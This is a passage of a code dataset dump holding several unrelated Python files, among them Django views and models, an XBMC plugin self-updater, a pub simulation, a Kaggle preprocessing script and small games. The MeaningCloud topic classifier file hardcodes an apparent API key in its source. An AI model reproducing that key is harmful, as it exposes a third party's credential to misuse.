)\n\n def test_str(self):\n expected = (' File \"../common/utils/geo_utils.py\", line 68, in get_ip_geo\\n'\n ' return get_geo_db().record_by_addr(ip_address)\\n')\n with open('git_stacktrace/tests/examples/trace3') as f:\n self.assertEqual(\n expected,\n str(parse_trace.Traceback(f.readlines(), filter_site_packages=True)))\n\n\nclass TestLine(base.TestCase):\n def test_line(self):\n line_data = (\"./file\", 1, 'foo', 'pass')\n line = parse_trace.Line(*line_data)\n line.git_filename = \"file\"\n self.assertEqual(line_data, line.traceback_format())\n","sub_path":"git_stacktrace/tests/test_parse_trace.py","file_name":"test_parse_trace.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"319635242","text":"import requests, json\n\ndef get_text_topics(text):\n
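 # POST the text to MeaningCloud's classification endpoint (model IAB_en) and return its categories sorted by relevance.\n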
 url = \"http://api.meaningcloud.com/class-1.1\"\n\n key = \"ba0fca3d6a9dfba10ead53c32c3265af\"\n # text = \"My name is Sebi and I like movies,but I also like songs\"\n model = \"IAB_en\" # or \"IPTC_en\" or \"SocialMedia_en\"\n\n payload = \"key=\" + key + \"&txt=\" + text + \"&model=\" + model\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n # Uncategorized\n text = response.text\n resp_json = json.loads(text)\n category_list = resp_json[\"category_list\"]\n mini_category_list = []\n for category in category_list:\n cat = category[\"label\"]\n subcat = \"\"\n if \">\" in category[\"label\"]:\n cat, subcat = category[\"label\"].split(\">\")\n mini_category_list += [{\"score\":int(category[\"relevance\"]),\n \"category\":cat,\n \"subcategory\":subcat}]\n mini_category_list = sorted(mini_category_list,key = lambda element: element[\"score\"], reverse=True)\n\n return mini_category_list\n","sub_path":"IA/Topic.py","file_name":"Topic.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"76648854","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import *\nfrom .forms import *\nfrom .stats import *\nfrom datetime import date\n\n# Create your views here.\n\n# Main Views\n\n\ndef index(request):\n inputs = PlayerInfo.objects.all()\n\n form = PlayerInfoForm()\n\n if request.method == \"POST\":\n form = PlayerInfoForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/\")\n\n contents = {'inputs': inputs, 'form': form}\n # Return a http response\n return render(request, 'index.html', contents)\n\n\ndef viewPlayer(request, pk): # pk is primary key\n\n player = PlayerInfo.objects.get(id=pk)\n\n playerid = get_ids(player.player_name, player.team)['player_id']\n teamid = get_ids(player.player_name, player.team)['team_id']\n\n playerinfo = get_player_info(\n playerid)['commoninfo']['resultSets'][0]['rowSet'][0]\n\n season_year = '{}-{}'.format(date.today().year-1, str(date.today().year)[2:4])\n season_type = 'Regular Season'\n\n games = get_games(playerid, season_year, season_type)\n recent_game = games['game']['resultSets'][0]['rowSet'][0]\n\n # 2021 Season Stats\n\n stats_ = get_player_stats(\n playerid, season_year, season_type)['careerstats']['resultSets'][0]['rowSet'][-1]\n\n points = get_player_stats(\n playerid, season_year, season_type)['PTS']\n\n assists = get_player_stats(\n playerid, season_year, season_type)['AST']\n\n rebounds = get_player_stats(\n playerid, season_year, season_type)['REB']\n\n content = {'Player': player.player_name, 'PlayerID': playerid,\n 'TeamID': teamid, 'SeasonYear': season_year, 'SeasonType': season_type,\n # 'Headers': games['resultSets'][0]['rowSet'],\n 'RecentGame': recent_game,\n 'PlayerInfo': playerinfo,\n 'CareerStats': stats_,\n 'PTS': points,\n 'AST': assists,\n 'REB': rebounds}\n\n return render(request, 'view_player.html', content)\n\n\ndef deletePlayer(request, pk):\n player = PlayerInfo.objects.get(id=pk)\n content = {'player': player}\n\n if request.method == \"POST\":\n player.delete()\n return redirect(\"/\")\n\n return render(request, 'delete_player.html', content)\n","sub_path":"info/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"301388922","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch.dispatcher import receiver\n\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nimport os\n\n# Create your models here.\n\nvideofs = FileSystemStorage(location=settings.MEDIA_ROOT)\nimagefs = FileSystemStorage(location=settings.MEDIA_ROOT)\n\nfile_formats = ['MOV', 'MPEG4', 'MP4', 'AVI', 'WMV', ]\nimage_formats = ['JPG', 'PNG']\n\n# TODO: Most watched by categories\n# TODO: Most active users\n# TODO: Recommend similar videos\n# TODO: delete MP3 from the file formats, it is only for testing\n\ndef validate_file_extension(value):\n extension = value.name.split('.')[-1].upper() # compare the upper-cased file extension\n if extension not in file_formats:\n raise ValidationError(u'Unsupported extension {}. Please use one of: {}.'.format(extension, ', '.join(file_formats)))\n\n\ndef validate_image_extension(value):\n extension = value.name.split('.')[-1].upper()\n if extension not in image_formats:\n raise ValidationError(u'Unsupported extension {}. Please use one of: {}.'.format(extension, ', '.join(image_formats)))\n\n\ndef name_file_as_videoid(instance, filename):\n ext = filename.split('.')[-1]\n filename = \"%s.%s\" % (instance.id, ext)\n return os.path.join(filename)\n\n\ndef name_image_as_videoid(instance, filename):\n ext = filename.split('.')[-1]\n filename = \"%s.%s\" % (instance.id, ext)\n return os.path.join(\"thumbnails\", filename)\n\n\ndef _delete_file(path):\n if os.path.isfile(path):\n os.remove(path)\n\n\nclass Video(models.Model):\n id = models.CharField(max_length=60, primary_key=True)\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n title = models.CharField(max_length=100)\n filename = models.FileField(storage=videofs, default='ERROR', validators=[validate_file_extension],\n upload_to=name_file_as_videoid)\n thumbnail = models.ImageField(default=\"thumbnails/default.jpg\", upload_to=name_image_as_videoid, validators=[validate_image_extension])\n description = models.CharField(max_length=500, blank=True, default=\"\")\n create_datetime = models.DateTimeField(auto_now_add=True)\n is_commentable = models.BooleanField(default=True)\n\n def __str__(self):\n return self.title\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return self.name\n\n\nclass Comment(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n video_id = models.ForeignKey(Video, on_delete=models.CASCADE)\n create_datetime = models.DateTimeField(auto_now_add=True)\n content = models.CharField(max_length=500)\n\n def __str__(self):\n return self.user.username + \": \" + self.video_id.title\n\n class Meta:\n unique_together = ((\"user\", \"video_id\", \"create_datetime\"),)\n\n\nclass VideoKategoria(models.Model):\n video_id = models.ForeignKey(Video, models.CASCADE)\n kat_id = models.ForeignKey(Category, models.CASCADE)\n\n def __str__(self):\n return self.video_id.title + \": \" + self.kat_id.name\n\n class Meta:\n unique_together = ((\"video_id\", \"kat_id\"),)\n\n\nclass Watched(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n video_id = models.ForeignKey(Video, on_delete=models.CASCADE)\n watched_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.user.username + \": \" + self.video_id.title\n\n\nclass Playlist(models.Model):\n user = 
models.ForeignKey(User, on_delete=models.CASCADE)\n title = models.CharField(max_length=100, null=False, blank=False)\n\n def __str__(self):\n return self.user.username + \": \" + self.title\n\n\nclass ListVideos(models.Model):\n list_id = models.ForeignKey(Playlist, models.CASCADE)\n sorszam = models.IntegerField(default='9999', )\n video_id = models.ForeignKey(Video, models.CASCADE)\n\n def __str__(self):\n return self.list_id.title + \" <- \" + self.video_id.title\n\n class Meta:\n unique_together = ((\"list_id\", \"video_id\"),)\n\n\n@receiver(models.signals.post_delete, sender=Video)\ndef delete_file(sender, instance, *args, **kwargs):\n if instance.filename:\n _delete_file(instance.filename.path)\n","sub_path":"manager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"165310953","text":"# No shebang line, this module is meant to be imported\n#\n# Copyright 2015 Oliver Palmer\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom os import urandom\nimport re\n\nfrom pyfarm.agent.config import config\nfrom pyfarm.agent.testutil import TestCase, ErrorCapturingParser\n\n\nclass TestConfigWithParser(TestCase):\n def test_set(self):\n key = urandom(16).encode(\"hex\")\n value = urandom(16).encode(\"hex\")\n parser = ErrorCapturingParser()\n parser.add_argument(\"--foo\", config=key, help=key, default=False)\n self.assertIn(key, config)\n args = parser.parse_args([\"--foo\", value])\n self.assertEqual(args.foo, value)\n self.assertIn(key, config)\n self.assertEqual(config[key], value)\n\n def test_uses_default(self):\n key = urandom(16).encode(\"hex\")\n parser = ErrorCapturingParser()\n parser.add_argument(\"--foo\", config=key, help=key, default=False)\n args = parser.parse_args()\n self.assertEqual(args.foo, False)\n self.assertEqual(config[key], False)\n\n def test_requires_default(self):\n parser = ErrorCapturingParser()\n with self.assertRaisesRegexp(\n AssertionError, re.compile(\".*no default was provided.*\")):\n parser.add_argument(\"--foo\", config=\"foo\", help=\"foo\")\n","sub_path":"tests/test_agent/test_testutil.py","file_name":"test_testutil.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"486884858","text":"\"\"\"\r\nUpdate module - PLUGIN VERSION\r\n\r\nChanges:\r\n18-11-2007 \r\n Use language self.pluginName in dialogs instead of __scriptname__\r\n Used regex to parse svn.\r\n Added a 'silent' mode.\r\n Changed to use YES/NO string ids.\r\n02-01-2008 Fixed error in downloadVersion()\r\n06-02-2008 Changed to update into same folder\r\n28-02-2008 removed a syntax error when not isSilent\r\n20-02-2008 Altered to save script backup into Q:\\\\scripts\\\\backups subfolder. 
Makes the scripts folder cleaner.\r\n20-04-2008 Fix makedir of backup folder.\r\n02-05-2008 \\backups renamed to \\.backups in anticipation of xbmc adopting hidden folder prefixed with '.'\r\n12-09-2008 use os.path.join instead of string +\r\n10-10-2008 Fix: to use xbmc.language from __main__\r\n Fix: Created folders replaced %20 with a space\r\n11-02-2009 Change: To use xbmc.translatePath() which converts Q: T: etc to their special:// equiv.\r\n Replace os.path.join with \"/\".join( [ ] ) as all paths now url form, using '/'\r\n13-02-2009 Change: Plugin version: Using svn xbmc-addons.googlecode.com\r\n23-03-2009 Change: module moved from resources/lib to pluginAPI\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nimport xbmcgui, xbmc\r\nimport urllib\r\nimport re\r\nimport traceback\r\nfrom shutil import copytree, rmtree\r\n\r\ndef log(msg):\r\n\ttry:\r\n\t\txbmc.output(\"[%s]: %s\" % (__name__, msg))\r\n\texcept: pass\r\n\r\n# check if build is special:// aware - set roots paths accordingly\r\nXBMC_HOME = 'special://home'\r\nif not os.path.isdir(xbmc.translatePath(XBMC_HOME)):\t# if fails to convert to Q:, old builds\r\n\tXBMC_HOME = 'Q:'\r\nlog(\"XBMC_HOME=%s\" % XBMC_HOME)\r\n\r\n\r\nclass UpdatePlugin:\r\n\t\"\"\" Update Class: used to update from xbmc google svn repo \"\"\"\r\n\r\n#\tURL_BASE = \"http://xbmc-scripting.googlecode.com/svn\"\r\n\tURL_BASE = \"http://xbmc-addons.googlecode.com/svn\"\r\n\t\r\n\tdef __init__( self, language, pluginName, pluginType ):\r\n\t\tlog( \"_init_ pluginName=%s pluginType=%s\" % (pluginName, pluginType) )\r\n\r\n\t\tself._ = language\r\n\t\tself.pluginName = pluginName\r\n\t\tself.pluginType = pluginType\r\n\r\n\t\tself.URL_TAGS = \"%s/tags/plugins/%s/%s/\" % ( self.URL_BASE, pluginType, pluginName)\r\n\t\tlocal_base_dir = \"/\".join( [XBMC_HOME,'plugins', pluginType] )\r\n\t\tself.local_dir = xbmc.translatePath( \"/\".join( [local_base_dir, pluginName] ) )\r\n\t\tself.backup_base_dir = xbmc.translatePath( \"/\".join( [local_base_dir,'.backups'] ) )\r\n\t\tself.local_backup_dir = os.path.join( self.backup_base_dir, pluginName )\r\n\r\n\t\tlog(\"URL_BASE=\" + self.URL_BASE)\r\n\t\tlog(\"URL_TAGS=\" + self.URL_TAGS)\r\n\t\tlog(\"local_dir=\" + self.local_dir)\r\n\t\tlog(\"local_backup_dir=\" + self.local_backup_dir)\r\n\r\n\t\tself.dialog = xbmcgui.DialogProgress()\r\n\r\n\r\n\tdef downloadVersion( self, version ):\r\n\t\t\"\"\" main update function \"\"\"\r\n\t\tlog( \"> downloadVersion() version=%s\" % version)\r\n\t\tsuccess = False\r\n\t\ttry:\r\n\t\t\tself.dialog.create( self.pluginName, self._( 1004 ), self._( 1005 ) )\r\n\t\t\tfolders = [version]\r\n\t\t\tscript_files = []\r\n\t\t\t# recusivly look for folders and files\r\n\t\t\twhile folders:\r\n\t\t\t\ttry:\r\n\t\t\t\t\thtmlsource = self.getHTMLSource( '%s%s' % (self.URL_TAGS, folders[0]) )\r\n\t\t\t\t\tif htmlsource:\r\n\t\t\t\t\t\t# extract folder/files stored in path\r\n\t\t\t\t\t\titemList, url = self.parseHTMLSource( htmlsource )\r\n\r\n\t\t\t\t\t\t# append folders to those we're looping throu and store file\r\n\t\t\t\t\t\tfor item in itemList:\r\n\t\t\t\t\t\t\tif item[-1] == \"/\":\r\n\t\t\t\t\t\t\t\tfolders.append( (\"%s/%s\" % (folders[ 0 ], item)) )\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tfile = \"%s/%s\" % (folders[ 0 ], item)\r\n\t\t\t\t\t\t\t\tscript_files.append( file.replace('//','/') )\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tlog(\"no htmlsource found\")\r\n\t\t\t\t\t\traise\r\n\t\t\t\t\tfolders = folders[1:]\r\n\t\t\t\texcept:\r\n\t\t\t\t\tfolders = None\r\n\r\n\t\t\tif not 
script_files:\r\n\t\t\t\tlog(\"empty script_files - raise\")\r\n\t\t\t\traise\r\n\t\t\telse:\r\n\t\t\t\tsuccess = self.getFiles( script_files, version )\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( self.pluginName, self._( 1031 ) )\r\n\r\n\t\tself.dialog.close()\r\n\t\tlog(\"< downloadVersion() success = %s\" % success)\r\n\t\treturn success\r\n\r\n\tdef getLatestVersion( self, silent=True ):\r\n\t\t\"\"\" checks for latest tag version \"\"\"\r\n\t\tversion = \"-1\"\r\n\t\ttry:\r\n\t\t\tif not silent:\r\n\t\t\t\tself.dialog.create( self.pluginName, self._( 1001 ) )\r\n\r\n\t\t\t# get version tags\r\n\t\t\thtmlsource = self.getHTMLSource( self.URL_TAGS )\r\n\t\t\tif htmlsource:\r\n\t\t\t\ttagList, url = self.parseHTMLSource( htmlsource )\r\n\t\t\t\tif tagList:\r\n\t\t\t\t\tversion = tagList[-1].replace(\"/\",\"\") # remove trailing /\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( self.pluginName, self._( 1031 ), str( sys.exc_info()[ 1 ] ) )\r\n\t\tself.dialog.close()\r\n\r\n\t\tlog( \"getLatestVersion() new version=%s\" % version )\r\n\t\treturn version\r\n\r\n\tdef makeBackup( self ):\r\n\t\tlog(\"> makeBackup()\")\r\n\t\tself.removeBackup()\r\n\t\t# make base backup dir\r\n\t\ttry:\r\n\t\t\tos.makedirs(self.backup_base_dir)\r\n\t\t\tlog(\"created dirs=%s\" % self.backup_base_dir )\r\n\t\texcept: pass\r\n\r\n\t\ttry:\r\n\t\t\tcopytree(self.local_dir, self.local_backup_dir)\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( \"Error Making Script Backup!\", str( sys.exc_info()[ 1 ] ) )\r\n\t\tlog(\"< makeBackup()\")\r\n\r\n\tdef issueUpdate( self, version ):\r\n\t\tlog(\"> issueUpdate() version=%s\" % version)\r\n\t\tpath = os.path.join( self.local_backup_dir, 'pluginAPI','update.py' )\r\n\t\tcommand = 'XBMC.RunScript(%s,%s,%s,%s)'%(path, self.pluginName.replace('%20',' '), self.pluginType, version)\r\n\t\tlog(command)\r\n\t\txbmc.executebuiltin(command)\r\n\t\tlog(\"< issueUpdate() done\")\r\n\t\r\n\tdef removeBackup( self ):\r\n\t\ttry:\r\n\t\t\trmtree(self.local_backup_dir,ignore_errors=True)\t\t\r\n\t\t\tlog(\"removeBackup() removed OK\")\r\n\t\texcept: pass\r\n\t\r\n\tdef removeOriginal( self ):\r\n\t\ttry:\r\n\t\t\trmtree(self.local_dir,ignore_errors=True)\r\n\t\t\tlog(\"removeOriginal() removed OK\")\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\r\n\tdef backupExists( self ):\r\n\t\texists = os.path.exists(self.local_backup_dir)\r\n\t\tlog(\"backupExists() %s\" % exists)\r\n\t\treturn exists\r\n\r\n\tdef getFiles( self, script_files, version ):\r\n\t\t\"\"\" fetch the files from svn \"\"\"\r\n\t\tlog( \"getFiles() version=%s\" % version )\r\n\t\tsuccess = False\r\n\t\ttry:\r\n\t\t\ttotalFiles = len(script_files)\r\n\t\t\tlog(\"getFiles() totalFiles=%d\" % totalFiles)\r\n\t\t\tfor cnt, url in enumerate( script_files ):\r\n\t\t\t\titems = os.path.split( url )\r\n\t\t\t\tpath = os.path.join( self.local_dir, items[0] ).replace( version+'/', '' ).replace( version, '' ).replace( '//', '/' ).replace( '%20', ' ' )\r\n\t\t\t\tfile = items[ 1 ].replace( '%20', ' ' )\r\n\t\t\t\tpct = int( ( float( cnt ) / totalFiles ) * 100 )\r\n\t\t\t\tself.dialog.update( pct, \"%s %s\" % ( self._( 1007 ), url, ), \"%s %s\" % ( self._( 1008 ), path, ), \"%s %s\" % ( self._( 1009 ), file, ) )\r\n\t\t\t\tif ( self.dialog.iscanceled() ): raise\r\n\t\t\t\tif ( not os.path.isdir( path ) ):\r\n\t\t\t\t\tos.makedirs( path )\r\n\t\t\t\tsrc = \"%s%s\" % (self.URL_TAGS, url)\r\n\t\t\t\tdest = os.path.join( path, file ).replace( 
'%20', ' ' )\r\n\t\t\t\tsrc = src.replace(' ','%20')\r\n\t\t\t\tlog(\"urlretrieve src=%s dest=%s\" % (src, dest))\r\n\t\t\t\turllib.urlretrieve( src, dest)\r\n\r\n\t\t\tsuccess = True\r\n\t\texcept:\r\n\t\t\traise\r\n\t\treturn success\r\n\r\n\tdef getHTMLSource( self, url ):\r\n\t\t\"\"\" read a doc from a url \"\"\"\r\n\t\tsafe_url = url.replace( \" \", \"%20\" )\r\n\t\tlog( \"getHTMLSource() \" + safe_url)\r\n\t\ttry:\r\n\t\t\tsock = urllib.urlopen( safe_url )\r\n\t\t\tdoc = sock.read()\r\n\t\t\tsock.close()\r\n\t\t\treturn doc\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( self.pluginName, \"HTTP Error\", str( sys.exc_info()[ 1 ] ) )\r\n\t\t\treturn None\r\n\r\n\tdef parseHTMLSource( self, htmlsource ):\r\n\t\t\"\"\" parse html source for tagged version and url \"\"\"\r\n\t\tlog( \"parseHTMLSource()\" )\r\n\t\ttry:\r\n\t\t\turl = re.search('Revision \\d+:(.*?)<', htmlsource, re.IGNORECASE).group(1).strip()\r\n\t\t\ttagList = re.compile('

 if time - self._startTime >= self._pouringTime:\r\n self._pouring = False\r\n self._poured = True\r\n\r\n\r\nclass Client:\r\n def __init__(self, id, howManyBeer=5, drinkTime=4):\r\n self._id = id # FIXME: no check that the id is unique\r\n self._startTime = 0\r\n self._mug = None\r\n self._howManyBeer = howManyBeer\r\n self._drinkTime = drinkTime\r\n self.state = \"Waiting\"\r\n\r\n def getID(self):\r\n return self._id\r\n\r\n def getMug_Delete(self):\r\n return self._mug\r\n\r\n def getHowManyBeer(self):\r\n return self._howManyBeer\r\n\r\n def __askForMug(self, listOfMugs):\r\n for mug in listOfMugs:\r\n if mug.isFree() and mug.isPoured():\r\n self._mug = mug\r\n mug.switchIsFree()\r\n break\r\n\r\n def drinking(self, time, listOfMugs):\r\n if self._mug is None:\r\n self.__askForMug(listOfMugs)\r\n if self._mug:\r\n self._startTime = time\r\n self.state = \"Drinking\"\r\n else:\r\n if time - self._startTime >= self._drinkTime:\r\n self._mug.switchIsFree()\r\n self._mug.switchPoured()\r\n self._mug = None\r\n self._howManyBeer -= 1\r\n self.state = \"Getting another one\"\r\n if self._howManyBeer == 0: self.state = \"Going home\"\r\n\r\n\r\nclass Pub:\r\n def __init__(self, numOfMug=10, dt=1e-2):\r\n self._time = 0\r\n self._dt = dt\r\n self._listOfClient = []\r\n self._listOfMugs = [Mug() for i in range(numOfMug)]\r\n\r\n def simulation(self):\r\n print(\r\n \"Note: I saw nothing in the task that forbids pouring all the mugs at the same time\")\r\n if self._listOfClient == []:\r\n N = input(\"Enter the number of clients: \")\r\n while not N.isdigit():\r\n N = input(\"The value must be an int: \")\r\n self._listOfClient = [Client(i) for i in range(int(N))]\r\n\r\n while self._listOfClient:\r\n self._time += self._dt\r\n deleteList = []\r\n\r\n print(\"\\nTime: \" + str(self._time))\r\n # check whether any mug has finished pouring\r\n for mug in self._listOfMugs:\r\n mug.pouring(self._time)\r\n # clients drink\r\n for client in self._listOfClient:\r\n client.drinking(self._time, self._listOfMugs)\r\n print(str(client.getID()) + \" : \" + client.state)\r\n if client.getHowManyBeer() == 0:\r\n deleteList.append(client)\r\n # check whether the barman can refill a mug right after it was emptied\r\n for mug in self._listOfMugs:\r\n mug.pouring(self._time)\r\n for client in deleteList:\r\n self._listOfClient.remove(client)\r\n\r\n\r\n
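# Demo run: a pub with 10 mugs and a 1-second time step.\r\n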
p = Pub(10, 1)\r\np.simulation()\r\ninput(\"The pub is closed. Good bye.\")","sub_path":"Skills/Python/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"375054517","text":"'''\n\nFirst Kaggle competition\n\nTalkingData predict Age/Gender groups from mobile device app usage\n\nRefactoring app categories into a profile of event counts for\neach category for each unique device\n\nThis is a programming approach to avoid dealing with large data files\n\n'''\n\nimport numpy as np\n\nnrows = 187244 # number of unique devices\nncols = 14 # number of app event categories + 1 for group\n\n# Create a 2D numpy array\nnew_data = np.zeros((nrows,ncols), float)\n\n\n# Open the data file for read\n\ninFILE = open(\"data/clean_test.csv\", 'r')\n\n# Loop through all the rows\n\n# For training data\n\n# The device id is column 3\n# The group is column 2\n# the app category is column 1\n\n# For testing data\n\n# The device id is column 2\n# the app category is column 1\n\n\nfor line in inFILE:\n # Split line\n split_line = line.split(',')\n # this ignores first line\n if not (split_line[2] == \"new_device_id\\n\"):\n device = float(split_line[2]) # column 2 of the test file is the device id\n category = float(split_line[1])\n # increment the category count\n new_data[int(device),int(category)] += 1.0\n # Set the last column as group (train) or device (test)\n new_data[int(device),13] = device\n\n\n# Save the data to csv\n\nnp.savetxt(\"test_data.csv\",new_data, delimiter=',')\ninFILE.close()\n\n","sub_path":"Sam/scripts/preprocess_data_2.py","file_name":"preprocess_data_2.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"236704444","text":"#Author Anand Chitale\nimport requests\nfrom bs4 import BeautifulSoup\nfrom bs4 import Tag\nimport csv\n'''\n@author Anand Chitale\n#This script goes through every page of the FOMC historical website and extracts raw\nmetadata information on every relevant document on the website\noutputting into raw_data.csv\n'''\ndef download_raw_doc_metadata():\n documents = []\n start_date, end_date = 2010,2019\n year_pages = get_year_pages(start_date,end_date)\n for year in year_pages:\n soup = BeautifulSoup(year,'lxml')\n\n #Article Div Tag Contains All Meeting Tables\n meeting_container = soup.find(\"div\", id=\"article\")\n year = meeting_container.find(\"h3\").text\n\n #contains a table of all documents in a meeting\n meeting_tables = meeting_container.findChildren(\"div\",recursive=False)\n\n for meeting_table in meeting_tables:\n meeting_info = meeting_table.find(\"h5\").text\n\n meeting_document_tables = meeting_table.find_all(\"div\")[1]\n\n #each p tag contains a set of one or more links to documents of a type\n document_types = meeting_document_tables.find_all(\"p\")\n for document_type in document_types:\n document_list = get_documents_and_links(document_type)\n grouping = get_grouping(document_type,document_list)\n #Append Meeting Specific Information to each document\n for document in document_list:\n document['grouping'] = grouping\n add_document(documents,document,year,meeting_info)\n\n #Catches any minutes that are not given in a p-tag, just written as text in the div\n meeting_document_lists = meeting_document_tables.find_all(\"div\")\n for meeting_document_list in meeting_document_lists:\n non_p_text = ''.join(meeting_document_list.find_all(text=True, recursive=False))\n non_p_text += get_non_link_inner_text(meeting_document_list)\n if non_p_text and 
non_p_text.strip():\n non_p_text = ' '.join(non_p_text.split())\n document = {'document_name':non_p_text,\n 'link': None\n }\n grouping = get_grouping(document['document_name'],None)\n document['grouping'] = grouping\n add_document(documents,document,year,meeting_info)\n\n write_to_csv(documents)\n\ndef get_year_pages(start_date,end_date):\n base_time_url = \"https://www.federalreserve.gov/monetarypolicy/fomchistorical\"\n\n # dictionary which holds each years page\n year_pages = []\n\n for year in range(start_date,end_date+1):\n url = base_time_url + str(year) + '.htm'\n resp = requests.get(base_time_url + str(year) + '.htm')\n if resp.status_code == requests.codes.ok:\n year_pages.append(resp.content)\n else:\n print(\"error occured. Could not get information for year:{} with url:{}\".format(year,url))\n continue\n return year_pages\n\n\ndef get_documents_and_links(document_type):\n documents = []\n comment = ''\n document_name = ''\n ptext = document_type.find(text=True, recursive=False)\n if ptext and ptext.strip():\n ptext = ptext.strip()\n #Takes care of edge case where reference was in p_text and minutes in link\n if ptext[0] == \"(\":\n comment = ptext\n else:\n document_name = ptext\n document_name += get_non_link_inner_text(document_type)\n links = document_type.find_all(\"a\")\n if not links:\n current_document = {}\n document_name += comment\n current_document['document_name'] = document_name\n current_document['link'] = None\n documents.append(current_document)\n else:\n for link in links:\n cur_doc_name = document_name + link.text\n cur_doc_name += comment\n current_document = {}\n current_document['document_name'] = cur_doc_name\n current_document['link'] = link.get(\"href\")\n documents.append(current_document)\n return documents\n\ndef add_document(documents,document,year,meeting_info):\n document['year'] = year\n document['meeting_info'] = meeting_info\n documents.append(document)\n\n# Writes information to CSV File\ndef write_to_csv(documents):\n with open('../output/lea_raw_data.csv', 'w') as csvfile:\n fieldnames = ['year', 'meeting_info', 'document_name', 'link', 'grouping']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for document in documents:\n writer.writerow(document)\n#We are only concerned with p tag text and the like, not link text\ndef get_non_link_inner_text(tag):\n inner_text = ''\n for child in tag.find_all(recursive=False):\n if type(child) == Tag and child.name == \"em\":\n inner_text += child.text\n return inner_text\n#Finds the grouping of the file based on properties of the fomc website\ndef get_grouping(document_type,document_list):\n if type(document_type) == str and document_list is None:\n grouping = document_type\n else:\n document_type_text = document_type.find(text=True, recursive=False)\n\n #Takes care of edge case where reference was in p_text and minutes in link\n if document_type_text and document_type_text.strip() \\\n and not document_type_text.strip()[0]==\"(\":\n grouping = document_type_text\n else:\n grouping = document_list[0]['document_name']\n return grouping\n\nif __name__ == \"__main__\":\n download_raw_doc_metadata()\n","sub_path":"lea_code/scripts/lea_download_later_years.py","file_name":"lea_download_later_years.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"395916028","text":"import math\nimport sys\nimport itertools\nimport itertools\n\ndef sa(Type= int):\n return [Type(x) for x in 
input().split()]\n\ndef solve(t):\n n, m = sa()\n\n print('YES' if n % m == 0 else 'NO')\n\nif __name__ == '__main__':\n sys.stdin = open('input.txt', 'r')\n\n t = int(input())\n for i in range(t):\n solve(i+1)\n","sub_path":"Code Forces/Code Forces 1312A - Two Regular Polygons.py","file_name":"Code Forces 1312A - Two Regular Polygons.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"619808872","text":"import random\n\ndef game_mode():\n \"\"\"Returns game mode from the user input.\"\"\"\n print (\"Let's play \\\"Mystery Word\\\". You have 8 guesses to solve the word.\")\n mode = input('\\nChoose the game mode (\"Easy, Normal or Hard\"): ').lower()\n return mode\n\n\ndef list_of_words():\n \"\"\"Calls read_file to get a list of words.\n Depending on the game mode, gets appropriate list.\n From the list gets mystery word calling random_word.\n Calls game with the mystery word argument.\"\"\"\n words_list = read_file(\"/usr/share/dict/words\")\n mode = game_mode()\n\n if mode == \"easy\":\n words_list = easy_words(words_list)\n elif mode == \"normal\":\n words_list = medium_words(words_list)\n elif mode == \"hard\":\n words_list = hard_words(words_list)\n\n mystery = random_word(words_list)\n game(mystery)\n\ndef random_word(words_list):\n \"\"\"Chooses a random word from the list and returns it\"\"\"\n mystery = random.choice(words_list)\n return mystery\n\ndef game(mystery):\n turns = 8\n guesses = \"\"\n print(\"The mystery word has {} characters.\".format(len(mystery)))\n while turns > 0:\n guess = input(\"\\nGuess a letter: \").upper()\n while guess.isdigit() or len(guess) != 1:\n print(\"Invalid input! Only one letter allowed.\")\n guess = input(\"\\nGuess a letter: \").upper()\n 